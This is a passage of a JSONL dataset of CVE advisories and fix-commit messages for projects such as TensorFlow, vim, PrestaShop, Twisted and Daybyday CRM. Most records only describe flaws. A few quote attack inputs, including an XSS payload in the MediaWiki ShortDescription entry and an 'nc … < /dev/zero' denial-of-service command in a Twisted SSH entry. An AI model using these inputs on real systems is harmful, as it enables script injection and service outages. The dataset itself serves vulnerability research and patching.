limited as it can only cause a normal EVM out-of-gas. Users who do not use MODEXP precompile in their runt", "cve_id": "CVE-2022-21685", "source": "cvefixes", "timestamp": ""} {"id": "1216297c677a5306b342", "text": "CVE: CVE-2022-21686\n\n[{'lang': 'en', 'value': 'PrestaShop is an Open Source e-commerce platform. Starting with version 1.7.0.0 and ending with version 1.7.8.3, an attacker is able to inject twig code inside the back office when using the legacy layout. The problem is fixed in version 1.7.8.3. There are no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-mrq4-7ch7-2465\n\nProperly escape smarty output for twig", "cve_id": "CVE-2022-21686", "source": "cvefixes", "timestamp": ""} {"id": "3ea3ad131eb8df300c69", "text": "CVE: CVE-2022-21687\n\n[{'lang': 'en', 'value': \"gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from host running gh-ost to the attack's malicious MySQL server. The `-database` parameter does not properly sanitize user input which can lead t", "cve_id": "CVE-2022-21687", "source": "cvefixes", "timestamp": ""} {"id": "7aaa95f2da32694a9bec", "text": "CVE: CVE-2022-21697\n\n[{'lang': 'en', 'value': 'Jupyter Server Proxy is a Jupyter notebook server extension to proxy web services. Versions of Jupyter Server Proxy prior to 3.2.1 are vulnerable to Server-Side Request Forgery (SSRF). Any user deploying Jupyter Server or Notebook with jupyter-proxy-server extension enabled is affected. A lack of input validation allows authenticated clients to proxy requests to other hosts, bypassing the `allowed_hosts` check. Because authentication is required, wh", "cve_id": "CVE-2022-21697", "source": "cvefixes", "timestamp": ""} {"id": "8b1e1dc51af5ab46c707", "text": "CVE: CVE-2022-21699\n\n[{'lang': 'en', 'value': 'IPython (Interactive Python) is a command shell for interactive computing in multiple programming languages, originally developed for the Python programming language. Affected versions are subject to an arbitrary code execution vulnerability achieved by not properly managing cross user temporary files. This vulnerability allows one user to run code as another on the same machine. All users are advised to upgrade.'}]\n\nFix commit: Merge pull request f", "cve_id": "CVE-2022-21699", "source": "cvefixes", "timestamp": ""} {"id": "195c99269b0e329c1947", "text": "CVE: CVE-2022-21700\n\n[{'lang': 'en', 'value': 'Micronaut is a JVM-based, full stack Java framework designed for building JVM web applications with support for Java, Kotlin and the Groovy language. In affected versions sending an invalid Content Type header leads to memory leak in DefaultArgumentConversionContext as this type is erroneously used in static state. ### Impact Sending an invalid Content Type header leads to memory leak in `DefaultArgumentConversionContext` as this type is erroneously", "cve_id": "CVE-2022-21700", "source": "cvefixes", "timestamp": ""} {"id": "07922641c8f9db9a19ad", "text": "CVE: CVE-2022-21706\n\n[{'lang': 'en', 'value': \"Zulip is an open-source team collaboration tool with topic-based threading. Zulip Server version 2.0.0 and above are vulnerable to insufficient access control with multi-use invitations. A Zulip Server deployment which hosts multiple organizations is vulnerable to an attack where an invitation created in one organization (potentially as a role with elevated permissions) can be used to join any other organization. This bypasses any restrictions on re", "cve_id": "CVE-2022-21706", "source": "cvefixes", "timestamp": ""} {"id": "0493751af438d89e9f7f", "text": "CVE: CVE-2022-21707\n\n[{'lang': 'en', 'value': 'wasmCloud Host Runtime is a server process that securely hosts and provides dispatch for web assembly (WASM) actors and capability providers. In versions prior to 0.52.2 actors can bypass capability authorization. Actors are normally required to declare their capabilities for inbound invocations, but with this vulnerability actor capability claims are not verified upon receiving invocations. This compromises the security model for actors as they can", "cve_id": "CVE-2022-21707", "source": "cvefixes", "timestamp": ""} {"id": "3ff7aa30838de11305ec", "text": "CVE: CVE-2022-21708\n\n[{'lang': 'en', 'value': 'graphql-go is a GraphQL server with a focus on ease of use. In versions prior to 1.3.0 there exists a DoS vulnerability that is possible due to a bug in the library that would allow an attacker with specifically designed queries to cause stack overflow panics. Any user with access to the GraphQL handler can send these queries and cause stack overflows. This in turn could potentially compromise the ability of the server to serve data to its users. Th", "cve_id": "CVE-2022-21708", "source": "cvefixes", "timestamp": ""} {"id": "34682a4c9281637984aa", "text": "CVE: CVE-2022-21710\n\n[{'lang': 'en', 'value': 'ShortDescription is a MediaWiki extension that provides local short description support. A cross-site scripting (XSS) vulnerability exists in versions prior to 2.3.4. On a wiki that has the ShortDescription enabled, XSS can be triggered on any page or the page with the action=info parameter, which displays the shortdesc property. This is achieved using the wikitext `{{SHORTDESC:<img src=x onerror=alert()>}}`. This issue has a patch in version ", "cve_id": "CVE-2022-21710", "source": "cvefixes", "timestamp": ""} {"id": "1fc493d420d577ab7b80", "text": "CVE: CVE-2022-21711\n\n[{'lang': 'en', 'value': 'elfspirit is an ELF static analysis and injection framework that parses, manipulates, and camouflages ELF files. When analyzing the ELF file format in versions prior to 1.1, there is an out-of-bounds read bug, which can lead to application crashes or information leakage. By constructing a special format ELF file, the information of any address can be leaked. elfspirit version 1.1 contains a patch for this issue.'}]\n\nFix commit: Fix #1 about out-of-b", "cve_id": "CVE-2022-21711", "source": "cvefixes", "timestamp": ""} {"id": "987bcb4fda3ec0fd84f7", "text": "CVE: CVE-2022-21712\n\n[{'lang': 'en', 'value': 'twisted is an event-driven networking engine written in Python. In affected versions twisted exposes cookies and authorization headers when following cross-origin redirects. This issue is present in the `twited.web.RedirectAgent` and `twisted.web. BrowserLikeRedirectAgent` functions. Users are advised to upgrade. There are no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-92x2-jw7w-xvvx\n\n10294 Advisory fix 1", "cve_id": "CVE-2022-21712", "source": "cvefixes", "timestamp": ""} {"id": "770d29babe3fc9d5eb03", "text": "CVE: CVE-2022-21715\n\n[{'lang': 'en', 'value': 'CodeIgniter4 is the 4.x branch of CodeIgniter, a PHP full-stack web framework. A cross-site scripting (XSS) vulnerability was found in `API\\\\ResponseTrait` in Codeigniter4 prior to version 4.1.8. Attackers can do XSS attacks if a potential victim is using `API\\\\ResponseTrait`. Version 4.1.8 contains a patch for this vulnerability. There are two potential workarounds available. Users may avoid using `API\\\\ResponseTrait` or `ResourceController` Users ", "cve_id": "CVE-2022-21715", "source": "cvefixes", "timestamp": ""} {"id": "904aba0e52b5f3bf0ca8", "text": "CVE: CVE-2022-21716\n\n[{'lang': 'en', 'value': \"Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 22.2.0, Twisted SSH client and server implement is able to accept an infinite amount of data for the peer's SSH version identifier. This ends up with a buffer using all the available memory. The attach is a simple as `nc -rv localhost 22 < /dev/zero`. A patch is available in version 22.2.0. There are currently no known workarounds.\"}]\n\nFix commit: Update ", "cve_id": "CVE-2022-21716", "source": "cvefixes", "timestamp": ""} {"id": "2460f8ad4303de984380", "text": "CVE: CVE-2022-21719\n\n[{'lang': 'en', 'value': 'GLPI is a free asset and IT management software package. All GLPI versions prior to 9.5.7 are vulnerable to reflected cross-site scripting. Version 9.5.7 contains a patch for this issue. There are no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-6cj4-g839-gj5j", "cve_id": "CVE-2022-21719", "source": "cvefixes", "timestamp": ""} {"id": "b80016fab66ebd23442a", "text": "CVE: CVE-2022-21720\n\n[{'lang': 'en', 'value': 'GLPI is a free asset and IT management software package. Prior to version 9.5.7, an entity administrator is capable of retrieving normally inaccessible data via SQL injection. Version 9.5.7 contains a patch for this issue. As a workaround, disabling the `Entities` update right prevents exploitation of this vulnerability.'}]\n\nFix commit: Merge pull request from GHSA-5hg4-r64r-rf83", "cve_id": "CVE-2022-21720", "source": "cvefixes", "timestamp": ""} {"id": "29c6482e5f65d554e4a9", "text": "CVE: CVE-2022-21722\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In version 2.11.1 and prior, there are various cases where it is possible that certain incoming RTP/RTCP packets can potentially cause out-of-bound read access. This issue affects all users that use PJMEDIA and accept incoming RTP/RTCP. A patch is available as a commit in the `master", "cve_id": "CVE-2022-21722", "source": "cvefixes", "timestamp": ""} {"id": "386bf5bd1576251332e1", "text": "CVE: CVE-2022-21723\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In versions 2.11.1 and prior, parsing an incoming SIP message that contains a malformed multipart can potentially cause out-of-bound read access. This issue affects all PJSIP users that accept SIP multipart. The patch is available as commit in the `master` branch. There are no known ", "cve_id": "CVE-2022-21723", "source": "cvefixes", "timestamp": ""} {"id": "d290639d81dfc15f387a", "text": "CVE: CVE-2022-21724\n\n[{'lang': 'en', 'value': 'pgjdbc is the offical PostgreSQL JDBC Driver. A security hole was found in the jdbc driver for postgresql database while doing security research. The system using the postgresql library will be attacked when attacker control the jdbc url or properties. pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection propertie", "cve_id": "CVE-2022-21724", "source": "cvefixes", "timestamp": ""} {"id": "2466e8e1952922dc542c", "text": "CVE: CVE-2022-21725\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The estimator for the cost of some convolution operations can be made to execute a division by 0. The function fails to check that the stride argument is strictly positive. Hence, the fix is to add a check for the stride argument to ensure it is valid. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, ", "cve_id": "CVE-2022-21725", "source": "cvefixes", "timestamp": ""} {"id": "deca45f2489b73243ad9", "text": "CVE: CVE-2022-21726\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `Dequantize` does not fully validate the value of `axis` and can result in heap OOB accesses. The `axis` argument can be `-1` (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound is not checked and this results in reading past the end of the array containing the dimensions o", "cve_id": "CVE-2022-21726", "source": "cvefixes", "timestamp": ""} {"id": "fdd533fe2968e11a539b", "text": "CVE: CVE-2022-21727\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `Dequantize` is vulnerable to an integer overflow weakness. The `axis` argument can be `-1` (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound is not checked, and, since the code computes `axis + 1`, an attacker can trigger an integer overflow. The fix ", "cve_id": "CVE-2022-21727", "source": "cvefixes", "timestamp": ""} {"id": "a4d06bd1b8bf59254da6", "text": "CVE: CVE-2022-21728\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of ", "cve_id": "CVE-2022-21728", "source": "cvefixes", "timestamp": ""} {"id": "3805092db9ea11550f8b", "text": "CVE: CVE-2022-21729\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `UnravelIndex` is vulnerable to a division by zero caused by an integer overflow bug. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix integer overflow leading to divide by zero error in Unravel index ke", "cve_id": "CVE-2022-21729", "source": "cvefixes", "timestamp": ""} {"id": "add44921fc57e270f4a6", "text": "CVE: CVE-2022-21730\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `FractionalAvgPoolGrad` does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add negative ", "cve_id": "CVE-2022-21730", "source": "cvefixes", "timestamp": ""} {"id": "89232b03aff020210c61", "text": "CVE: CVE-2022-21731\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ConcatV2` can be used to trigger a denial of service attack via a segfault caused by a type confusion. The `axis` argument is translated into `concat_dim` in the `ConcatShapeHelper` helper function. Then, a value for `min_rank` is computed based on `concat_dim`. This is then used to validate that the `values` tensor has at least the required rank. How", "cve_id": "CVE-2022-21731", "source": "cvefixes", "timestamp": ""} {"id": "93ead886332a9a61ec15", "text": "CVE: CVE-2022-21732\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `ThreadPoolHandle` can be used to trigger a denial of service attack by allocating too much memory. This is because the `num_threads` argument is only checked to not be negative, but there is no upper bound on its value. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these a", "cve_id": "CVE-2022-21732", "source": "cvefixes", "timestamp": ""} {"id": "b3f4e772ec5127352f82", "text": "CVE: CVE-2022-21733\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `StringNGrams` can be used to trigger a denial of service attack by causing an out of memory condition after an integer overflow. We are missing a validation on `pad_witdh` and that result in computing a negative value for `ngram_width` which is later used to allocate parts of the output. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on", "cve_id": "CVE-2022-21733", "source": "cvefixes", "timestamp": ""} {"id": "455e6b708c5ced280c4e", "text": "CVE: CVE-2022-21734\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `MapStage` is vulnerable a `CHECK`-fail if the key tensor is not a scalar. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add a check for Key being scalar tensor for MapStage and OrderedMapStage ops.\n\nAcco", "cve_id": "CVE-2022-21734", "source": "cvefixes", "timestamp": ""} {"id": "b8b7953c119cd4a69c3a", "text": "CVE: CVE-2022-21735\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `FractionalMaxPool` can be made to crash a TensorFlow process via a division by 0. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix potential divide by zero error when executing FractionalMaxPool, when p", "cve_id": "CVE-2022-21735", "source": "cvefixes", "timestamp": ""} {"id": "0cd7ff4ffe8f17eedcee", "text": "CVE: CVE-2022-21736\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseTensorSliceDataset` has an undefined behavior: under certain condition it can be made to dereference a `nullptr` value. The 3 input arguments to `SparseTensorSliceDataset` represent a sparse tensor. However, there are some preconditions that these arguments must satisfy but these are not validated in the implementation. The fix will be included in TensorFlow 2.8.0.", "cve_id": "CVE-2022-21736", "source": "cvefixes", "timestamp": ""} {"id": "78a1621c4644105d41a3", "text": "CVE: CVE-2022-21737\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `*Bincount` operations allows malicious users to cause denial of service by passing in arguments which would trigger a `CHECK`-fail. There are several conditions that the input arguments must satisfy. Some are not caught during shape inference and others are not caught during kernel implementation. This results in `CHECK` failures later when the output tensors get allocat", "cve_id": "CVE-2022-21737", "source": "cvefixes", "timestamp": ""} {"id": "b4ee59952feb0680ff8d", "text": "CVE: CVE-2022-21738\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseCountSparseOutput` can be made to crash a TensorFlow process by an integer overflow whose result is then used in a memory allocation. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Prevent crash due", "cve_id": "CVE-2022-21738", "source": "cvefixes", "timestamp": ""} {"id": "ded43d9798d15422eb3e", "text": "CVE: CVE-2022-21739\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `QuantizedMaxPool` has an undefined behavior where user controlled inputs can trigger a reference binding to null pointer. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix nullptr exception in QuantizedM", "cve_id": "CVE-2022-21739", "source": "cvefixes", "timestamp": ""} {"id": "55e26f7708dff38db725", "text": "CVE: CVE-2022-2174\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2174", "source": "cvefixes", "timestamp": ""} {"id": "474c81185af059962fac", "text": "CVE: CVE-2022-21740\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseCountSparseOutput` is vulnerable to a heap overflow. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Cleanup and remove duplicate validation in `SparseCount`.\n\nWe have valdiation that is duplicated, ", "cve_id": "CVE-2022-21740", "source": "cvefixes", "timestamp": ""} {"id": "92b89f4d6cbaafdec46f", "text": "CVE: CVE-2022-21740\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseCountSparseOutput` is vulnerable to a heap overflow. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Further validate sparse tensor for `SparseCount`: indices must be valid within dense shape.\n\nPiper", "cve_id": "CVE-2022-21740", "source": "cvefixes", "timestamp": ""} {"id": "a76826bca2ad048c3a02", "text": "CVE: CVE-2022-21741\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. ### Impact An attacker can craft a TFLite model that would trigger a division by zero in the implementation of depthwise convolutions. The parameters of the convolution can be user controlled and are also used within a division operation to determine the size of the padding that needs to be added before applying the convolution. There is no check before this division that the divisor is strict", "cve_id": "CVE-2022-21741", "source": "cvefixes", "timestamp": ""} {"id": "0c65e31ee7c0819e7ecb", "text": "CVE: CVE-2022-2175\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5148: invalid memory access when using expression on command line\n\nProblem: Invalid memory access when using an expression on the command line.\nSolution: Make sure the position does not go negative.", "cve_id": "CVE-2022-2175", "source": "cvefixes", "timestamp": ""} {"id": "50d86e03602485e0b0ce", "text": "CVE: CVE-2022-21802\n\n[{'lang': 'en', 'value': 'The package grapesjs before 0.19.5 are vulnerable to Cross-site Scripting (XSS) due to an improper sanitization of the class name in Selector Manager.'}]\n\nFix commit: Protect Selector Manager views from XSS. Closes #4411", "cve_id": "CVE-2022-21802", "source": "cvefixes", "timestamp": ""} {"id": "a1c9e00fd1a07947d4fb", "text": "CVE: CVE-2022-2182\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5150: read past the end of the first line with \":0;'{\"\n\nProblem: Read past the end of the first line with \":0;'{\".\nSolution: When on line zero check the column is valid for line one.", "cve_id": "CVE-2022-2182", "source": "cvefixes", "timestamp": ""} {"id": "50f73c0cde165aeb7994", "text": "CVE: CVE-2022-2183\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5151: reading beyond the end of the line with lisp indenting\n\nProblem: Reading beyond the end of the line with lisp indenting.\nSolution: Avoid going over the NUL at the end of the line.", "cve_id": "CVE-2022-2183", "source": "cvefixes", "timestamp": ""} {"id": "ae9fbc2fd98ef0d7b3e9", "text": "CVE: CVE-2022-2206\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5160: accessing invalid memory after changing terminal size\n\nProblem: Accessing invalid memory after changing terminal size.\nSolution: Adjust cmdline_row and msg_row to the value of Rows.", "cve_id": "CVE-2022-2206", "source": "cvefixes", "timestamp": ""} {"id": "3377570ca01d8a60072b", "text": "CVE: CVE-2022-2207\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5162: reading before the start of the line with BS in Replace mode\n\nProblem: Reading before the start of the line with BS in Replace mode.\nSolution: Check the cursor column is more than zero.", "cve_id": "CVE-2022-2207", "source": "cvefixes", "timestamp": ""} {"id": "53d9180d32b1332ce18f", "text": "CVE: CVE-2022-2208\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.5163.'}]\n\nFix commit: patch 8.2.5163: crash when deleting buffers in diff mode\n\nProblem: Crash when deleting buffers in diff mode.\nSolution: Recompute diffs later. Skip window without a valid buffer.", "cve_id": "CVE-2022-2208", "source": "cvefixes", "timestamp": ""} {"id": "6724ea2398b1c55cb349", "text": "CVE: CVE-2022-2210\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5164: invalid memory access after diff buffer manipulations\n\nProblem: Invalid memory access after diff buffer manipulations.\nSolution: Use zero offset when change removes all lines in a diff block.", "cve_id": "CVE-2022-2210", "source": "cvefixes", "timestamp": ""} {"id": "32a2c9433311a7da6930", "text": "CVE: CVE-2022-22107\n\n[{'lang': 'en', 'value': 'In Daybyday CRM, versions 2.0.0 through 2.2.0 are vulnerable to Missing Authorization. An attacker that has the lowest privileges account (employee type user), can view the appointments of all users in the system including administrators. However, this type of user is not authorized to view the calendar at all.'}]\n\nFix commit: password change requires 6 on update, and only allowed users can see calendar", "cve_id": "CVE-2022-22107", "source": "cvefixes", "timestamp": ""} {"id": "824d1c2274b56cc7569e", "text": "CVE: CVE-2022-22108\n\n[{'lang': 'en', 'value': 'In Daybyday CRM, versions 2.0.0 through 2.2.0 are vulnerable to Missing Authorization. An attacker that has the lowest privileges account (employee type user), can view the absences of all users in the system including administrators. This type of user is not authorized to view this kind of information.'}]\n\nFix commit: ensure only admin and owner can change role, and password, unless it is yourself", "cve_id": "CVE-2022-22108", "source": "cvefixes", "timestamp": ""} {"id": "73a00989d7ea30689a93", "text": "CVE: CVE-2022-22109\n\n[{'lang': 'en', 'value': 'In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.'}]\n\nFix commit: fix xss for tasks index", "cve_id": "CVE-2022-22109", "source": "cvefixes", "timestamp": ""} {"id": "8cefd040920e428ca450", "text": "CVE: CVE-2022-22110\n\n[{'lang': 'en', 'value': 'In Daybyday CRM, versions 1.1 through 2.2.0 enforce weak password requirements in the user update functionality. A user with privileges to update his password could change it to a weak password, such as those with a length of a single character. This may allow an attacker to brute-force users’ passwords with minimal to no computational effort.'}]\n\nFix commit: password change requires 6 on update, and only allowed users can see calendar", "cve_id": "CVE-2022-22110", "source": "cvefixes", "timestamp": ""} {"id": "5ae8eb1b6078a601b2c5", "text": "CVE: CVE-2022-22111\n\n[{'lang': 'en', 'value': 'In DayByDay CRM, version 2.2.0 is vulnerable to missing authorization. Any application user in the application who has update user permission enabled is able to change the password of other users, including the administrator’s. This allows the attacker to gain access to the highest privileged user in the application.'}]\n\nFix commit: ensure only admin and owner can change role, and password, unless it is yourself", "cve_id": "CVE-2022-22111", "source": "cvefixes", "timestamp": ""} {"id": "0db89995fcff37187a6c", "text": "CVE: CVE-2022-22114\n\n[{'lang': 'en', 'value': 'In Teedy, versions v1.5 through v1.9 are vulnerable to Reflected Cross-Site Scripting (XSS). The “search term\" search functionality is not sufficiently sanitized while displaying the results of the search, which can be leveraged to inject arbitrary scripts. These scripts are executed in a victim’s browser when they enter the crafted URL. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The inj", "cve_id": "CVE-2022-22114", "source": "cvefixes", "timestamp": ""} {"id": "63033b5bc1138384104d", "text": "CVE: CVE-2022-22115\n\n[{'lang': 'en', 'value': 'In Teedy, versions v1.5 through v1.9 are vulnerable to Stored Cross-Site Scripting (XSS) in the name of a created Tag. Since the Tag name is not being sanitized properly in the edit tag page, a low privileged attacker can store malicious scripts in the name of the Tag. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator. The injected scripts can extract the Session ID, which can lead to full Accou", "cve_id": "CVE-2022-22115", "source": "cvefixes", "timestamp": ""} {"id": "8214167dbebc0059a93b", "text": "CVE: CVE-2022-22116\n\n[{'lang': 'en', 'value': 'In Directus, versions 9.0.0-alpha.4 through 9.4.1 are vulnerable to stored Cross-Site Scripting (XSS) vulnerability via SVG file upload in media upload functionality. A low privileged attacker can inject arbitrary javascript code which will be executed in a victim’s browser when they open the image URL.'}]\n\nFix commit: Add Content-Security-Policy header by default (#10776)", "cve_id": "CVE-2022-22116", "source": "cvefixes", "timestamp": ""} {"id": "99fc406af38d10ace9f5", "text": "CVE: CVE-2022-22117\n\n[{'lang': 'en', 'value': 'In Directus, versions 9.0.0-alpha.4 through 9.4.1 allow unrestricted file upload of .html files in the media upload functionality, which leads to Cross-Site Scripting vulnerability. A low privileged attacker can upload a crafted HTML file as a profile avatar, and when an admin or another user opens it, the XSS payload gets triggered.'}]\n\nFix commit: Add Content-Security-Policy header by default (#10776)", "cve_id": "CVE-2022-22117", "source": "cvefixes", "timestamp": ""} {"id": "84196a90a908854b97be", "text": "CVE: CVE-2022-22143\n\n[{'lang': 'en', 'value': 'The package convict before 6.2.2 are vulnerable to Prototype Pollution via the convict function due to missing validation of parentKey. **Note:** This vulnerability derives from an incomplete fix of another [vulnerability](https://security.snyk.io/vuln/SNYK-JS-CONVICT-1062508)'}]\n\nFix commit: More complete fix against prototype pollution\n\nfirst addressed in https://github.com/mozilla/node-convict/pull/384", "cve_id": "CVE-2022-22143", "source": "cvefixes", "timestamp": ""} {"id": "e34bd6d36e7c5e957852", "text": "CVE: CVE-2022-2216\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "cve_id": "CVE-2022-2216", "source": "cvefixes", "timestamp": ""} {"id": "50d94f7c4f728fd2589f", "text": "CVE: CVE-2022-2217\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "cve_id": "CVE-2022-2217", "source": "cvefixes", "timestamp": ""} {"id": "680f41f829ff61822a05", "text": "CVE: CVE-2022-2218\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "cve_id": "CVE-2022-2218", "source": "cvefixes", "timestamp": ""} {"id": "90be88c8d5b3a06ef277", "text": "CVE: CVE-2022-2231\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5169: nested :source may use NULL pointer\n\nProblem: Nested :source may use NULL pointer.\nSolution: Do not use the NULL pointer.", "cve_id": "CVE-2022-2231", "source": "cvefixes", "timestamp": ""} {"id": "bf5f2bf47f7d3b9c05ea", "text": "CVE: CVE-2022-2252\n\n[{'lang': 'en', 'value': 'Open Redirect in GitHub repository microweber/microweber prior to 1.2.19.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2252", "source": "cvefixes", "timestamp": ""} {"id": "470e6aaa6564f4f70c32", "text": "CVE: CVE-2022-2257\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0009: going past the end of a menu item with only modifier\n\nProblem: Going past the end of a menu item with only modifier.\nSolution: Check for NUL.", "cve_id": "CVE-2022-2257", "source": "cvefixes", "timestamp": ""} {"id": "bb4ba53b0ea25ee7aa83", "text": "CVE: CVE-2022-2264\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0011: reading beyond the end of the line with put command\n\nProblem: Reading beyond the end of the line with put command.\nSolution: Adjust the end mark position.", "cve_id": "CVE-2022-2264", "source": "cvefixes", "timestamp": ""} {"id": "31c3c36881397b99cafd", "text": "CVE: CVE-2022-2279\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository bfabiszewski/libmobi prior to 0.11.'}]\n\nFix commit: Fix undefined behavior when passing null to strdup", "cve_id": "CVE-2022-2279", "source": "cvefixes", "timestamp": ""} {"id": "c9043bb08f464ca55b2e", "text": "CVE: CVE-2022-2280\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.19.'}]\n\nFix commit: update", "cve_id": "CVE-2022-2280", "source": "cvefixes", "timestamp": ""} {"id": "4b31a2206c9fd1bbc548", "text": "CVE: CVE-2022-2284\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0017: accessing memory beyond the end of the line\n\nProblem: Accessing memory beyond the end of the line.\nSolution: Stop 